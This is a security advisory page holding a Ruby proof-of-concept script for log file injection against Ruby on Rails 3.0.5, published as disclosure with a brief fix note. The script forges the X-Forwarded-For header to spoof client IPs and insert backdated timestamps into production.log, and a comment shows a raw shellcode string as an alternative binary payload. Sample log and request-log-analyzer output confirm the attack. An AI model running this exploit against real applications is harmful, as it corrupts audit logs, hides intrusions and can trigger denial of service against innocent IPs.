Rails 3.0.5 Log File Injection Proof Of Concept

2011.03.15
Credit: none
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Encoding: UTF-8 # # Log-File-Injection - Ruby on Rails 3.05 # possibilities: # - possible date back attacks (tried with request-log-analyzer: worked but teaser_check_warnings) # - ip spoofing # - binary log-injections # - DOS if ip is used with an iptables-ban-script # # !! works only on intranet apps !! # # Fix: # validate request.remote_ip until they fix it # ----------------------- # jimmybandit.com # http://webservsec.blogspot.com require 'rubygems' require 'mechanize' require 'iconv' ip = "192.168.1.21 " # some shell code just for binary-data demo payload = ip + "at Mon Jan 01 00:00:00 +1000 2009\x0D\0x0A" # date back attacks with ipspoofing # payload = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" binarypayload is also possible a = Mechanize.new a.pre_connect_hooks << lambda { |p| p[:request]['X-Forwarded-For'] = payload } page = a.get('http://192.168.1.21/people') # results =begin ################################ production.log: ################################ Started GET "/people" for 192.168.1.21 at Mon Jan 01 00:00:00 +1000 2009 at Sun Mar 13 17:47:47 +0100 2011 Processing by PeopleController#index as Rendered people/index.html.erb within layouts/application (24.4ms) Completed 200 OK in 63ms (Views: 32.9ms | ActiveRecord: 3.6ms) ################################ request-log-analyzer: ################################ web@debian:~/testapp/log$ request-log-analyzer production.log Request-log-analyzer, by Willem van Bergen and Bart ten Brinke - version 1.10.0 Website: http://railsdoctors.com production.log: 100% [==========] Time: 00:00:00 Request summary ??????????????????????? Parsed lines: 14 Skipped lines: 0 <------- Parsed requests: 7 <------- Skipped requests: 0 Warnings: teaser_check_failed: 7 First request: 2009-01-01 00:00:12 Last request: 2009-01-01 00:00:12 Total time analyzed: 0 days Request distribution per hour ???????????????????????????? 0:00 ? 7 hits/day ? ????????????????????????????????? 1:00 ? 0 hits/day ? ... =end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top